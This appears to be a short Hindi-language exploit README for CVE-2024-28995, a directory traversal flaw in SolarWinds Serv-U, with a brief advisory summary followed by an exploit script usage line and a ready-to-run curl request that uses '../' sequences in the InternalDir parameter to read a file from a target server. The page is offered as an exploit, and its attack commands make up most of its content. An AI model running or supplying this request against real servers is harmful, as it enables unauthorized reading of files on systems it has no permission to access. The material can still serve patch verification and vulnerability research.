
CVE-2024-28995 के लिए Exploit
5 जून 2024 को, SolarWinds ने CVE-2024-28995 के लिए एक सलाह प्रकाशित की, यह एक उच्च गंभीरता वाली निर्देशिका ट्रैवर्सल कमजोरी है जो उनके फ़ाइल स्थानांतरण समाधान Serv-U को प्रभावित करती है। इस कमजोरी की खोज Web Immunify के शोधकर्ता Hussein Daher ने की थी।
python3 CVE-2024-28995.py -t http://example.com/ -f somefile
curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"
संदर्भ: